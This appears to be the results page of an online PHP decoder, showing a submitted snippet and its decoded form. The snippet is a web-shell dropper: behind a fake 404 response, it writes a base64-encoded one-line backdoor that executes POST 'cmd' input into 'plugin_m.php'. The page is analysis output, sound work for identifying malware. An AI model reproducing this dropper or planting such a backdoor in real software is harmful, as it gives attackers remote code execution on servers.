Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php header('HTTP/1.1 404'); ob_start(); @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'..

Decoded Output download

<?php 
header('HTTP/1.1 404'); 
ob_start(); 
@fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg==')); 
ob_end_clean(); 
?>

Did this file decode correctly?

Original Code

<?php
header('HTTP/1.1 404');
ob_start();
@fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
ob_end_clean();
?>

Function Calls

header 1

Variables

None

Stats

MD5 fc5377db3ce427a10b97138d67de4466
Eval Count 0
Decode Time 83 ms